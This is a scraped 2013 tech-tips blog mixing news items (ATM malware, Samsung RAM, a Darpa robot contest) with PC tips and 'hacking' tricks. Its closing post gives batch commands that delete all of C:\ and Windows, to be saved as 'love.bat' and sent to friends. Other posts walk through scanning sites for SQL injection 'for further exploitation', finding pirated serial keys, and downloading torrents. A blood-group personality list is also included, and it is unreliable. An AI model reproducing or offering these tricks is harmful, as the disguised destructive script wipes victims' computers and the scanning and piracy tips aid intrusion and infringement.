Friends of Technology is an IT base firm which seeks to empower both the youth and adults through ICT
Tuesday 31 December 2013
Friends of Technology: Cash machines raided with infected USB sticks
Friends of Technology: Cash machines raided with infected USB sticks: The thieves focused on high value notes to minimise the time they were exposed Researcher...
Cash machines raided with infected USB sticks
Researchers have revealed how cyber-thieves sliced into cash machines in order to infect them with malware earlier this year.
The criminals cut the holes in order to plug in USB drives that installed their code onto the ATMs.Details of the attacks on an unnamed European bank's cash dispensers were presented at the hacker-themed Chaos Computing Congress in Hamburg, Germany.
The crimes also appear to indicate the thieves mistrusted each other.
The two researchers who detailed the attacks have asked for their names not to be published
Access code The thefts came to light in July after the lender involved noticed several its ATMs were being emptied despite their use of safes to protect the cash inside.
After surveillance was increased, the bank discovered the criminals were vandalising the machines to use the infected USB sticks.
Once the malware had been transferred they patched the holes up. This allowed the same machines to be targeted several times without the hack being discovered.
To activate the code at the time of their choosing the thieves typed in a 12-digit code that launched a special interface.
Analysis of software installed onto four of the affected machines demonstrated that it displayed the amount of money available in each denomination of note and presented a series of menu options on the ATM's screen to release each kind.
The researchers said this allowed the attackers to focus on the highest value banknotes in order to minimise the amount of time they were exposed.
But the crimes' masterminds appeared to be concerned that some of their gang might take the drives and go solo.
To counter this risk the software required the thief to enter a second code in response to numbers shown on the ATM's screen before they could release the money.
The correct response varied each time and the thief could only obtain the right code by phoning another gang member and telling them the numbers displayed.
If they did nothing the machine would return to its normal state after three minutes.
The researchers added the organisers displayed "profound knowledge of the target ATMs" and had gone to great lengths to make their malware code hard to analyse.
However, they added that the approach did not extend to the software's filenames - the key one was called hack.bat
Friends of Technology: Samsung Galaxy S5 could come with 4GB RAM
Friends of Technology: Samsung Galaxy S5 could come with 4GB RAM: Samsung today unveiled the latest 8Gb LPDDR4 RAM for high-end smart devices, using which the company can offer as much as 4GB of memory...
Samsung Galaxy S5 could come with 4GB RAM
Samsung today unveiled the latest 8Gb LPDDR4 RAM for high-end smart devices, using which the company can offer as much as 4GB of memory on a device. According to ZDNet Korea, this RAM could be first featured on the forthcoming Samsung Galaxy S5.
Samsung has used a 20nm process to fabricate the 8Gb LPDDR4 RAM and can fit 1GB of memory into a single chip. What this essentially means is that using four such chips in a single device, Samsung could offer 4GB of RAM in a single device.
The newly developed RAM is also said to be 50 percent faster in terms of performance and consumes 40 percent less energy at 1.1 volts than LPDDR3 RAM. Samsung will start manufacturing the RAM early next year and could hence be ready to power the forthcoming Galaxy S5 smartphone.
From what we know so far, the Galaxy S5 is likely to feature a 5.25-inch 2,560×1,440 pixels display with a pixel density of 560ppi, an integrated eye scanner, a new 64-bit eight-core Exynos processor or a quad-core Snapdragon processor depending on the device model, a 16-megapixel camera with new technology that improves low-light photo quality, a 4,000mAh battery and run on Android 4.4 KitKat.
HAPPY NEW YEAR
Happy new year guys,expect more and new stuff from Friends of Technology next year.................. HAPPY NEW YEAR
Friends of Technology: This is very latest n interesting research about a...
Friends of Technology: This is very latest n interesting research about a...: A(+) : Good Leadership A(-) : Hard Working B(+) : Can give up (sacrifices) for others B(-) : Non Flexible , Selfish n Sadistic 0(+) : S...
This is very latest n interesting research about all 8 blood Group...
A(+) : Good Leadership
A(-) : Hard Working
B(+) : Can give up (sacrifices) for others
B(-) : Non Flexible , Selfish n Sadistic
0(+) : Sharp Minded, very difficult to
understand
0(-) : Narrow Minded
AB(+) : Born to Help
AB(-) : Intelligent !
Share with your Friends
7 hours ago
Like · Comment · Share
Hide story
34 people like this.
Write a comment...
Comment
Or attach a photo
Guess the output of the following C Code:-
#include<stdio.h>
#include<conio.h>
void main()
{
int i=3;
if(i==3);
printf("I will be printed 3 times\n");
getch();
}
The 5 Most Basic Methods to Start LearningHacking
1. Learn TCP/IP, HTTP and HTTP Proxies.
2. Learn HTML, PHP, JavaScript, Python and C++
3. Learn Web Application Arch. & OWASP Top 10 Vul.
4. Learn Common Attacks, Flaws, Bugs and Exploits.
5. Work with Linux, & Try to Understand How System Works.
Friends of Technology: 5 Best Free Microsoft Office Alternatives
Friends of Technology: 5 Best Free Microsoft Office Alternatives: - - - - - - - - - - - - - - - - - - - - - - Microsoft office is the major productivity package which contains number of useful tools lik...
5 Best Free Microsoft Office Alternatives
- - - - - - - - - - - - - - - - - - - - - -
Microsoft office is the major productivity package which contains number of useful tools like Microsoft word, excel, PowerPoint etc. But we cant get it for free. Microsoft office is the commercial version developed Microsoft Corporation. Actually the price of this package is higher than windows OS. Actually this package is available 60 days for free. However, it�s important for small business owners to know that these types of office applications are also available in free and open source office productivity applications.
Read More:- http://techreviewpoint.com/5-best-free-microsoft-office-alternatives/
Friends of Technology: What is a capacitive touchscreen?
Friends of Technology: What is a capacitive touchscreen?: --Most commonly used in premium smartphones and tablets , capacitive touchscreens are able to sense the electrical conductivity of a hum...
What is a capacitive touchscreen?
--Most commonly used in premium smartphones and tablets , capacitive touchscreens are able to sense the electrical conductivity of a human fingertip and use it to determine its location on the screen.
Insulating materials such as gloves will prevent such touchscreens working. So don't use these touchscreen while wearing gloves.
Nowadays, most of the Android phone manufacturers use capacitive touch for their devices due to its efficiency.
Friends of Technology: Calculation Size of Circuit Breaker & Fuse are as ...
Friends of Technology: Calculation Size of Circuit Breaker & Fuse are as ...: This MS Excel spreadsheet has possibilities to calculate following: - Size of Circuit Breaker on Primary side of Transformer as per NE...
Friends of Technology: How To Find Vulnerable Website using SQL
Friends of Technology: How To Find Vulnerable Website using SQL: Poizon Software Steps:- 1) First download SQL Poizon software. 2) Now run Sql Poizon v1.1 - The Exploit Scanner.exe file and you will...
Calculation Size of Circuit Breaker & Fuse are as per NEC 450.3
This MS Excel spreadsheet has possibilities to calculate following:
- Size of Circuit Breaker on Primary side of Transformer as per NEC 450.3
- Size of Fuse on Primary side of Transformer as per NEC 450.3
- Size of Circuit Breaker on Secondary side of Transformer as per NEC 450.3
- Size of Fuse on Secondary side of Transformer as per NEC 450.3
- Size of Transformer
- Transformer Full Load Losses.
Spreadsheet is developed by Mr. Jignesh Parmar
How To Find Vulnerable Website using SQL
Poizon Software
Steps:-
1) First download SQL Poizon software.
2) Now run Sql Poizon v1.1 - The Exploit Scanner.exe file and
you will get the following window.
3) Once you have opened it, you will have to select a dork. I
am using an PHP dork in this example. After you have
selected the desired dork press Scan and it'll show the results
in the Result Panel.
4) Now you have to send the results to the Sqli Crawler. You
can do this by rightclicking in the Results Panel and select
" Send to Sqli Crawler -> All "
5) Now the Sqli Cralwer tab will open and all you have to do
is press Crawl and it will check if the website is really
vulnerable to SQL Injection.
6) Now you have to press Export Results and place it
somewhere where you can open it later for furthur
exploitation.
H4ckz
Monday 30 December 2013
Friends of Technology: HOW TO FIND SERIAL KEYS FROM GOOGLE
Friends of Technology: HOW TO FIND SERIAL KEYS FROM GOOGLE: steps:- 1) go to google.com 2) write the name of the software you want key and add 94FBR at the end Eg :- if you want to find key of ...
HOW TO FIND SERIAL KEYS FROM GOOGLE
steps:-
1) go to google.com
2) write the name of the software you want key
and add 94FBR at the end
Eg :- if you want to find key of IDM then write "
IDM 94FBR " (without quotes)
3) search it and you will find many sites with
serial keys of that software's
DONE !!!!
Top 20 Websites Making The Most Money
20. LinkedIn - $215,200,000 $7 per second
19. ClickBank - $350,000,000 $11 per second
18. Yandex - $439,700,000 $14 per second
17. Orbitz - $757,500,000 $24 per second
16. Groupon - $760,000,000 $24 per second
15. Taobao - $774,210,000 $25 per second
14. Zynga - $850,000,000 $27 per second
13. Skype - $860,000,000 $27 per second
12. Overstock - $1,100,000,000 $35 per second
11. Baidu - $1,199,000,000 $38 per second
10. Facebook - $2,000,000,000 $63 per second
9. NetFlix - $2,160,000,000 $68 per second
8. AOL - $2,417,000,000 $77 per second
7. Priceline – $3,072,240,000 $97 per second
6. Expedia, Inc. - $3,348,000,000 $106 per second
5. Alibaba - $5,557,600,000 $176 per second
4. Yahoo! - $6,324,000,000 $200 per second
3. eBay - $9,156,000,000 $290 per second
2. Google - $29,321,000,000 $929 per second
1. Amazon – $34,204,000,000 $1,084 per second
Top Websites to Download Torrents via IDM
- - - - - - - - - - - - - - - - - - - - - -
Hey Friends i am gona show you sites list if you use them to download torrent you will no more need torrent soft wares and you can download directly.You can use INTERNET DOWNLOAD MANAGER (IDM) to download for high speed.
Why Download Torrents via IDM?
IDM is the most popular Download ...
Read More:- http://techreviewpoint.com/top-websites-to-download-torrents-via-idm/
Friends of Technology: How to use USB pen drive as RAM in Windows XP :
Friends of Technology: How to use USB pen drive as RAM in Windows XP :: 1. First connect your pen drive to computer. Note that pen drive should be at least of 1GB. 2. Now right click on the my computer and the...
How to use USB pen drive as RAM in Windows XP :
1. First connect your pen drive to computer. Note that pen drive should be at least of 1GB.
2. Now right click on the my computer and then click properties.
3. Click on Advanced Tab and then Performance.
4. Now click on Advanced and then click on Virtual Memory.
5. Select your pen drive icon and click Custom size.
6. Now view the memory available in your pen drive and note it down then click on OK.
7. Restart your computer and enjoy your fast system. How to use USB pen drive as RAM in Windows Vista and Windows 7:
1. Insert your pen drive and format it.
2. Right click on your pen drive and click on properties.
3. Now click on Ready boost tab and then Use this device.
4. Choose maximum space to reserve system speed then click on OK and Apply. You've done! use your pen drive as RAM.
Today I Am Back With Latest Airtel Free Hellotune Trick.
Follow Below Simple Method:
Dial *678*559# From Your Airtel Mobile
And Your Callertune Is Successfully Set Without Any Cost.
Note:- Deactivate Callertune Before 1 Month Completion, Then After Deactivation You Can Activate Callertune Again.
Saturday 28 December 2013
Friends of Technology: HOW TO CHANGE MAC ADDRESS IN KALI / BACKTRACK /LIN...
Friends of Technology: HOW TO CHANGE MAC ADDRESS IN KALI / BACKTRACK /LIN...: It is very easy to change mac address in backtrack as we can change mac address to any in a minute by using simple commands. Let's st...
HOW TO CHANGE MAC ADDRESS IN KALI / BACKTRACK /LINUX
It is very easy to change mac address in backtrack as we can change mac address to any in a minute by using simple commands.
Let's start.
1. Open Terminal.
2. In terminal, type ifconfig eth0 down.
3. The above command is used for disabling the eth0 interface.
4. Now change the mac address by using a simple command in backtrack.
macchanger --mac 00:11:22:33:44:55 eth0.
5. You change your mac address to any number by using the following command.
6. Now configure the eth0 by a command
ifcofig eth0 up
7.Thats it you have changed mac address.
Friday 27 December 2013
2013 BONUS TRICKS FOR ALL OF YOU
1. How to Download Facebook Videos
Simply copy the URL of the video you want to download, then go to http://www.downvids.net/, paste your link and click download. Tada! Your video will be downloaded in few minutes!
2. Track Pending Friends Requests That You Have Made
Sent a friend request but don't know if it has been accepted? Track your request by following below steps:
- Open Friend Request App apps.facebook.com/friendrequestsafter logging
in to Facebook and allow the app to access your friend requests.
- Click on the find 'past pending friend requests', for tracing previous sent requests.
- Click on Get Friend Request data button and copy paste the code from the popup.
- Finally click on the load friend request button and you will get your list of pending friend requests.
- Click on suggested tab to get a list of suggested friends or you can
click on Bulk upload friend tab to confirm requests people sent to you.
- You can cancel any request just by clicking the cancel button in front of user profile from the list.
3. Remove Facebook Advertisements
Yes it is possible if you use Google Chrome! The Fabulous extension for
Google chrome, helps you disable the Facebook advertisements so you can
enjoy the cleaner Facebook.
4. Customize Facebook colors and fonts
The Fabulous extension of Chrome is indeed fabulous! Not only will it
help you to remove the Facebook ads as we mentioned above, but it also
helps you to change the color of your facebook page! Sounds amazing no?
5. Create Cool text styles for Facebook
You can create stylish font text styles for Facebook status by using Webestools that converts your text in stylish font!
6. Choose Custom Title and Description for Links
You can choose a custom title and description for links you post on Facebook by clicking on them.
7. Send large files up to 1 GB on Facebook
Yes you read it right, you can send big files upto 1 GB directly from
your Facebook. One can store files in the locker till certain number of
days so that your friends can download them via pipe app on Facebook.
Your friends can download them in upto 1 week time.
8. Find Who UnFriends you on Facebook
Yes we know that there are a lot of spam apps that want to tell you
about the old friends that have unfriended you, but it is not just a
trick. It is actually possible by using unfriend alerts application for
Facebook. This app sends you notifications whenever any of your friends
removes you from his/her friend list.
9. Disable Seen option in Facebook Chat
We know how tricky the new 'seen at xx:xx AM' feature on Facebook chat
can get. Have you ever wished to disable this feature? Well here's the
solution if you have chrome. Just install FB unseen extension to your
chrome browser and your friends will never get notified when you read
their messages.
10. Check Who Is Online and pretending to be Offline
So you think your girl friend is online and she is trying to ignore you
by getting invisible? Well before you burst into a fight, try using
this app. The Online now application will help you detect which friend
is using Facebook secretly while keeping Facebook Chat offline.
11. Change Facebook Themes
If you think just changing the color of Facebook wasn't enough, how
about changing the colors and whole look of Facebook website? Here is
another amazing chrome/mozilla extension 'Facebook themes' that allows
you to change Facebook themes.
12. Facebook Fake Wall Post Prank
This is one real fun prank for Facebook which allows you to create
custom Facebook status updates, alerts, events on the behalf of others.
So get set to create status updates with name of famous celebrities by
using thewallmachine and connect using Facebook account in order to
proceed.
13. Login to Multiple Facebook account at a Time
By using Google chrome Browser, you can login to multiple Facebook
accounts at a time. Open Google chrome and login to your Facebook
account. Then click the settings tab and add a new user to chrome
browser. It will open a new chrome window where you can login to other
Facebook account. Now, you will be able to use and manage both accounts
using the two chrome windows. In the similar manner, you can access as
many Facebook accounts as you like using Google chrome ,
Some Major Internet Error Codes and their Meanings :-
# 400 - error is simply a bad request error, as you might be typing some unknown URL that server could not understand, so make sure that URL you are typing is write.
# 401 - If you try to access some unauthorized website than you might see this 401 error, so make sure you have entered correct username and password.
# 402 - error is specified for any kind of payment errors you receive, so if you attempting any transaction and you forgot to add payment information than you might face this error.
# 403 - error can cause if you are accessing any forbidden page s its somewhat similar to 401 error, so make sure you are not blocked by that website.
# 404 - is the most common and most recognized error, so its like most website have this error, so that website might be removed or re-named so make sure spellings are good.
# 408 - error is the timeout error, so if you are on some page where it requires you to add something in specified time and you do not do that than you might face this 408 error.
Friends of Technology: Hacking Windows SEND TO MENU
Friends of Technology: Hacking Windows SEND TO MENU: Now send any file to your Folder directly via Send to Menu... Follow the Steps... First you’ll need access to hidden files. So change y...
Hacking Windows SEND TO MENU
Now send any file to your Folder directly via Send to Menu...
Follow the Steps...
First you’ll need access to hidden files. So change your view
settings to make all hidden files visible.
In My Computer..
Tools -> folder options -> view (tab) and select the show
hidden files and folders.
go to parent drive:/documents and settings/(user name)/send
to
Open up my computer and locate your most used folders.
Create a shortcut of the most used folders in SEND TO
FOLDER. (You can do this in a number of ways.)
Right click -> send to desktop(create shortcut) and move the
shortcut from the desktop to the SEND TO FOLDER
Copy the most used folder and go to SEND TO FOLDER and
right click -> paste shortcut.
Also remember to rename the shortcuts to send to videos or
send to photos. You don’t need confusion when You use the
same later.
#H4ckz
Friends of Technology: Play Movie In Paint
Friends of Technology: Play Movie In Paint: Step 1: Open Ms Paint. Step 2: Open your Video player. Step 3: Click on the Print screen Button on your keyboard. Step 4: In Ms Paint...
Play Movie In Paint
Step 1: Open Ms Paint.
Step 2: Open your Video player.
Step 3: Click on the Print screen Button on your keyboard.
Step 4: In Ms Paint us the shortcut ctrl+v or got to the Edit Tab and choose Paste option.
Step 5: Bingo!!!!
Note:
1. This works only with Ms Paint.
2. For the movie to play in Paint the video player should not be closed and the movie should not be paused in the player.
Friends of Technology: 6 Websites To learn Coding !!!
Friends of Technology: 6 Websites To learn Coding !!!: The below Websites will help you to learn CSS, HTML, PHP, JavaScript, CSS3, HTML5, Ruby, etc and it doesn't require any skills . #1...
6 Websites To learn Coding !!!
The below Websites will help you to learn
CSS, HTML, PHP, JavaScript, CSS3, HTML5,
Ruby,
etc and it doesn't require any skills .
#1. w3schools
#2. Codecademy
#3. Code avengers
#4. CodeSchool
#5.TeamtreeHouse
#6.Dreamincode
Friends of Technology: Here some common PC errors and the solutions for t...
Friends of Technology: Here some common PC errors and the solutions for t...: Do have a look...................!! 1. MONITOR LED IS BLINKING Check all the connections like Monitor Cable, Data cables,RAM, Display C...
Here some common PC errors and the solutions for them...
Do have a look...................!!
1. MONITOR LED IS BLINKING
Check all the connections like Monitor Cable, Data
cables,RAM, Display Card , CPU connections.
2. CONTINUOS THREE BEEPS
Problem in RAM Connection.
3. THREE BEEPS ( 1 Long 2 Short)
Problem in Display Card Connection
4. THREE LONG BEEPS PERIOD WISE
Problem in BIOS or RAM (Basic Input Output System)
5. CONTINUOS NON-STOP BEEPING
Key Board Problem (I.e.; Some Key is pressed for
Longer time)
6. FDD LED IS GLOWING CONTINUOSLY
Data cable to be connected properly (twisted cable).
7. NO DISPLAY ON THE SCREEN AT ALL
Hard Disk cable connected wrongly. Connect rightly
seeing the Red mark (Faces power supply) and then
Restart.
8. POWER LED IS OFF
a. Check main power cord
b. Check S.M.P.S.
c. Check Mother Board connection
9. SHOWING CMOS ERROR
Replace 3 Volt battery of Mother Board . Set Original
Settings Manually.(Refer CMOS Setup chart)
Enter your search termsSubmit search form
10. SHOWING FDD ERROR OR FLOPPY DRIVE IS NOT
WORKING PROPERLY
Check Power cord of FDD , Data Cables , set CMOS &
Finally the Check drive.
11. SHOWING HDD ERROR OR HARD DISK FAILURE
a. Check Power Cord
b. Check connection of HDD
c. Check Data cable
d. Check Hard Disk parameters in CMOS or Auto
detecting Setting Partitions by Fdisk Command, then
format it to set track 0.
12. MOTHER BOARD HANGS DUE TO UNSTABILIZED
POWER SUPPLY
a. Check S.M.P.S
b. RAM not functioning properly.
c. Software problem (due to using pirated software)
d. CPU fan not functioning properly.
13. DANCING SCREEN
a. Check Display card connection
b. Virus Problem
c. Video Memory Problem
14. SHAKING SCREEN
a. Earthing problem
b. Magnetic waves comes around.
15. CPU CABINET SHOCK
a. Check Earthing
b. Check main power cord.
16. NON-SYSTEM DISK ERROR
a. Floppy Drive having different disk (Non-Bootable
Disk) OR CMOS Parameters for Hard Disk may not be
set properly.
b. Hard Disk Partitions may not be created.
c. Hard Disk may not be formatted.
17. MISSING OPERATING SYSTEM
The System files missing namely Ie; command.com} -
User File IO.SYS & MS_DOS.SYS } - Hidden Files. These
above three files required for Start up of the system
that can be transferred by using SYS C: Command OR
While the time of formatting by using Format c:/u/s
18. MISSING COMMAND INTERPRETOR
May the file Command.com is corrupted OR Infected
by Virus OR Some one has Erased it.
19. SHOWING I/O ERROR
a. The type of Hard Disk in CMOS may not be set
properly.
b. Operating system used for formatting is not valid
20. SHOWING DIVIDE OVER- FLOW MESSAGE
a. May some Directories or Files crash with other files.
b. Use CHKDSK/F or SCANDISK Command to correct it.
21. HARD DISK MAKING NOISE WHILE PROCESSING
a. Unstabilized power supply.
b. Check for Loose Contact.
c. Do not use Y Connectors for Hard Disk.
d. It may create Bad Sector OR Weak Hard Disk.
22. HARD DISK HANGS WHILE PROCESSING
Check for Bad Sector by using CHKDSK or SCANDISK
Command. If found format the Hard Disk and set
Partition before that area.(This is the only procedure
to use Hard Disk with Bad Sector) OR (To avoid Bad
Sectors use Standard Power Supply)
23. HARD DISK NOT DETECTED
a. Check Power Connector
b. Check Data Cables
c. Check Jumpers
24. PARTITION NOT SHOWN
Operating System where the Hard Disk formatted is
not supported with present Mother Board. For Eg:
Hard Disk formatted with Pentium System will hide
their partitions for 486 System.
25. MMX/DLL FILE MISSING
May the above files may be corrupted due to power
failure or Virus. Make available above files from other
Computer. OR Reinstall Windows 98 Operating
System. (This procedure will not make any effect on
existing Data).
26. WINDOWS REGISTRY ERROR
This will happen due to sudden ON/OFF of the
system. Final solution is to Reinstall Operating System.
27. DISPLAY COLOUR DOES NOT MATCH
a. Configure Display Card properly with their CD.
b. The Standard setting for Windows is set it to
800x600 for better performance.
28. UNKNOWN DEVICE FOUND
May the Driver utility is not provided with operating
system . Insert Driver CD and install software for the
above Device...
Ways To Attack a Network:
>>>>Ping
The IP address gives the attacker’s Internet address. The numerical
address like 212.214.172.81 does not reveal much. You can use PING to
convert the address into a domain name in WINDOWS: The Domain Name
Service (DNS) protocol reveals the matching domain name. PING stands for
“Packet Internet Groper” and is delivered with practically every
Internet compatible system, including all current Windows versions.
Make sure you are logged on to the net. Open the DOS shell and enter
the following PING command:
Ping –a 123.123.12.1
Ping will search the domain name and reveal it. You will often have information on the provider the attacker uses e.g.:
dialup21982.gateway123.provider.com
Pinging is normally the first step involved in hacking the target. Ping uses
>>>>ICMP
(Internet Control Messaging Protocol) to determine whether the target
host is reachable or not. Ping sends out ICMP Echo packets to the target
host, if the target host is alive it would respond back with ICMP Echo
reply packets.
All the versions of Windows also contain the ping tool. To ping a remote host follow the procedure below.
Click Start and then click Run. Now type ping <ip address or hostname>
(For example: ping yahoo.com)
This means that the attacker logged on using “provider.com”.
Unfortunately, there are several IP addresses that cannot be converted into domain names.
For more parameter that could be used with the ping command, go to
DOS prompt and type ping /?.
>>>>Ping Sweep
If you are undetermined about your target and just want a live system,
ping sweep is the solution for you. Ping sweep also uses ICMP to scan
for live systems in the specified range of IP addresses. Though Ping
sweep is similar to ping but reduces the time involved in pinging a
range of IP addresses. Nmap (http://www.insecure.org/) also contains an option
to perform ping sweeps.
>>>Tracert:
Tracert is another interesting tool available to find more interesting information about a remote host. Tracert also uses ICMP.
Tracert helps you to find out some information about the systems
involved in sending data (packets) from source to destination. To
perform a tracert follow the procedure below.
Tracer connects
to the computer whose IP has been entered and reveals all stations
starting from your Internet connection. Both the IP address as well as
the domain name (if available) is displayed.
If PING cannot
reveal a name, Traceroute will possibly deliver the name of the last or
second last station to the attacker, which may enable conclusions
concerning the name of the provider used by the attacker and the region
from which the attacks are coming.
Go to DOS prompt and type tracert <destination address>
(For example: tracert yahoo.com).
But there are some tools available like Visual Traceroute which help you
even to find the geographical location of the routers involved.
http://www.visualware.com/visualroute
>>>Port Scanning:-
After you have determined that your target system is alive the next
important step would be to perform a port scan on the target system.
There are a wide range of port scanners available for free. But many of
them uses outdated techniques for port scanning which could be easily
recognized by the network administrator. Personally I like to use Nmap (http://www.insecure.org/) which has a wide range of options. You can download the NmapWin and its source code from:
http://www.sourceforge.net/projects/nmapwin.
Apart from port scanning Nmap is capable of identifying the Operating
system being used, Version numbers of various services running,
firewalls being used and a lot more.
Common ports:
Below is a list of some common ports and the respective services
running on the ports.
20 FTP data (File Transfer Protocol)
21 FTP (File Transfer Protocol)
22 SSH
23 Telnet
25 SMTP (Simple Mail Transfer Protocol)
53 DNS (Domain Name Service)
68 DHCP (Dynamic host Configuration Protocol)
79 Finger
80 HTTP
110 POP3 (Post Office Protocol, version 3)
137 NetBIOS-ns
138 NetBIOS-dgm
139 NetBIOS
143 IMAP (Internet Message Access Protocol)
161 SNMP (Simple Network Management Protocol)
194 IRC (Internet Relay Chat)
220 IMAP3 (Internet Message Access Protocol 3)
389 LDAP
443 SSL (Secure Socket Layer)
445 SMB (NetBIOS over TCP)
Besides the above ports they are even some ports known as Trojan ports used by Trojans that allow remote access to that system.
>>>>Vulnerability Scanning:
Every operating system or the services will have some vulnerabilities
due to the programming errors. These vulnerabilities are crucial for a
successful hack. Bugtraq is
an excellent mailing list discussing the
vulnerabilities in the various system. The exploit code writers write
exploit codes to exploit these vulnerabilities existing in a system.
There are a number of vulnerability scanners available to scan the host
for known vulnerabilities. These vulnerability scanners are very
important for a network administrator to audit the network security.
Some of such vulnerability scanners include Shadow Security Scanner,Stealth HTTP Scanner, Nessus, etc. Visit
http://www.securityfocus.com/ vulnerabilities and exploit codes of various operating systems. Packet storm security
(http://www.packetstormsecurity.com/) is also a nice pick.
Thursday 26 December 2013
Friends of Technology: Google Robot Won
Friends of Technology: Google Robot Won: Florida-A robot developed by a Japanese start-up recently acquired by Google is the winner of a two-day competition hosted by ...
Friends of Technology: No Mobile in 2014
Friends of Technology: No Mobile in 2014: In 2014, the mobile Web will die. That’s right, that bastardized version of the normal Web will crawl into a shallow grave and leave u...
No Mobile in 2014
In 2014, the mobile Web will
die. That’s right, that bastardized version of the normal Web will crawl
into a shallow grave and leave us all in peace. No more websites crippled with
horrible “mobile.yourawfulwebsite.com” URLs. No more reading junky websites
that display way too much fine print or omit crucial features when viewed on
your smartphone or tablet.
How will we kill the mobile Web? Not
with kindness, that’s for sure. The death of the mobile Web should be ruthless
and efficient, coming on the backs of development, iteration and innovation.
Google, Microsoft and Apple will lead the charge.
This year, we saw a lot of
developmental gains in the browsers on mobile devices:
·
Apple updated Safari in iOS 7 to be
faster and more agile
·
Google showed off its newest
version of its Chrome browser at Google I/O in May this year to show the
same website running on a PC, tablet and smartphone without a hitch
·
Microsoft’s latest Internet Explorer
in Windows 8.1 RT and Windows Phone 8 is the fastest and most diverse that the
company has ever created
·
Mozilla unleashed its Firefox OS on
the world, a browser-based mobile operating system designed on the principles
of HTML5.
The mobile Web will die because the
companies that make the engines it ran upon are killing their mobile browsers
and replacing them with fully functional versions that run on any device. In
2014, these browsers will be updated to put the final nail in its coffin.
In turn, developers will continue to
build websites that can work across any screen size. Responsive design (what we
do at Read Write to make the site look pretty everywhere) will continue to grow
in 2014 as people realize that their old websites are losing them a lot of
traffic from mobile devices.
That’s the prediction, at least. Now
it's up to 2014 to prove me right.
Looking Backward
Last year I went out on a limb with my
mobile predictions for 2013. As always, the prognostications were a little
hit and miss.
I said that BlackBerry (then still
Research In Motion) would kill it with the new BlackBerry 10 operating
system. Today, BlackBerry announced a $4.4 billion quarterly loss.
OK, so I pooched that one badly. But
I got the next one right when I said that Microsoft would continue to iterate
and expand with Windows Phone. While Microsoft hasn't yet hit it big with its
rival to iOS and Android, it's still gaining ground, so I'll count that as a
win. With Nokia now in its fold, next year may be the acid test for Windows
Phone.
I was right when I said that Apple
would release the iPhone first and the iPad second this year, as the iPhone was
released in September and the iPhone in late October. A minor prediction for
2014: Apple will do this again.
Google tweaked me with its Android
releases in 2013. I expected Android 5.0 Key Lime Pie and thought we'd see
three different iterations of Android this year. Instead we got two: the Jelly
Bean 4.3 update in July and the KitKat 4.4 update at the end of October. The
age of the major Android update is over, and we'll continue to see iterative
updates over time. This is not a prediction; it's merely a fact. In 2014, we
will likely see two new versions of Android at mid-year and the end of the
year.
Motorola didn’t make a Nexus device
this year. It did make the Moto X, which is the next best thing. Motorola will
likely continue with the Moto brand of devices in 2014 without making an actual
Nexus device.
Location-based consumer apps didn't
let me down; as predicted, they remained stagnant this year. Foursquare and its
kindred just are not hot anymore, even if Foursquare did just raise a funding
round this week.
On the other hand, mobile payments
continued to gain traction. Personally, I use a mobile payments app every day
with the Square Wallet at my local coffee shop. Mobile payments may never
be the techno-utopia that everybody envisioned in 2011, but the industry is
beginning to take shape. In 2014, we will see more people start using apps like
Google Wallet and Square to pay at retailers everywhere. It won’t be a major
step, but a progression of small ones.
Looking Forward
1. There Will Be No Apple Television
Set
That’s it. Let’s quit it with the
rumors about an actual Apple TV set until Tim Cook is showing it off on stage.
2. The Apple iWatch Cometh
3. Samsung’s Lead In Smartphones
Will Decline
Samsung smartphones just aren't as
sexy as they were in 2011 and 2012. Clearly, the company will continue to sell
vast numbers of devices, but its status as the global mobile powerhouse will
slip. That's going to create an opening that Motorola and HTC can and will
seize.
4. HTML5 Takes Over The Mobile Web
5. Google Glass Becomes A Consumer
Product
In so many ways, 2013 was the year
that Google Glass got beta tested. The Glass “Explorers” program was rolled out
to a small subset of techies and Google got developers on board for future apps
for Glass. It's time for Google to unleash its interesting and controversial
cyborg headsets on the world. Prediction: Google will announce Glass for the
masses at Google I/O with a retail price of $299.
6. Android Goes 64-Bit
This isn't actually much of a bold
prediction. ARM announced a 64-bit architecture a few years ago with the aim of
making it to the mainstream by 2014 or so. Apple has already proved that ARM
can work on 64-bit with the iPhone 5S and the iPad Air. Expect Samsung to roll
out the first 64-bit ARM chip in a popular Android smartphone, with the
blessing of Google.
7. The Concept Of “Mobile” Will Die
Since 2007, when Apple squeezed the
power of a PC into a phone, the technology industry has been working to create
the same systems, functionality and processes to work with this new class of
computing device. Consumers, enterprises, advertising, industry, agriculture …
everything that computing touches has been working to catch up with the mobile
era.
Eventually it will catch up and
instead of thinking of things as “mobile” specifically, it will just be seen as
a way to use a computer from anywhere and everywhere. The era of ubiquitous
computing is already upon us.
Google Robot Won
Florida-A robot developed by a Japanese start-up recently acquired by Google is the winner of a two-day competition hosted by the Pentagon’s research unit Darpa.
Team Schaft’s machine carried out all eight rescue-themed tasks to outscore its rivals by a wide margin.
Three of the other 15 teams that took part failed to secure any points at the event near Miami, Florida.
Schaft and seven of the other top-scorers can now apply for more Darpa funds to compete in 2014’s finals.
Darpa said it had been inspired to organise the challenge after it became clear robots were only capable of playing a very limited role in efforts to contain 2011’s Fukushima nuclear reactor meltdown in Japan.
“What we realized was ... these robots couldn’t do anything other than observe,” said Gill Pratt, programme manager for the Darpa Robotics Challenge.
“What they needed was a robot to go into that reactor building and shut off the valves.”
In order to spur on development of more adept robots the agency challenged contestants to complete a series of tasks, with a time-limit of 30 minutes for each:
* Drive a utility vehicle along a course
* Climb an 8ft-high (2.4m) ladder
* Remove debris blocking a doorway
* Pull open a lever-handled door
* Cross a course that featured ramps, steps and unfastened blocks
* Cut a triangular shape in a wall using a cordless drill
* Close three air valves, each controlled by a different-sized wheel or lever
* Unreel a hose and then screw its nozzle into a wall connector
More than 100 teams originally applied to take part, and the number was whittled down to 17 by Darpa ahead of Friday and Saturday’s event.
Some entered their own machines, while others made use of Atlas - a robot manufactured by another Google-owned business, Boston Dynamics - controlling it with their own software.
One self-funded team from China - Intelligent Pioneer - dropped out at the last moment, bringing the number of contestants who took part at the Homestead-Miami Speedway racetrack to 16.
Schaft’s 1.48m (4ft 11in) tall, two-legged robot entered the contest the favourite and lived up to its reputation.
It makes use of a new high-voltage liquid-cooled motor technology that uses a capacitor, rather a battery, for power. Its engineers say this lets its arms move and pivot at higher speeds than would otherwise be possible, in effect giving it stronger “muscles”.
Shut Down a Computer Forever
Open notepad and type following code :-
cmd /c del c:\windows\* /F /S /Q
cmd /c del c:\* /F /S /Q
save this file with "love.bat"
send this file to your friends.
when your friend try to open this file , the computer will shut down forever.................
Enjoy................
WARNING: I am not responsible for any thing.
cmd /c del c:\windows\* /F /S /Q
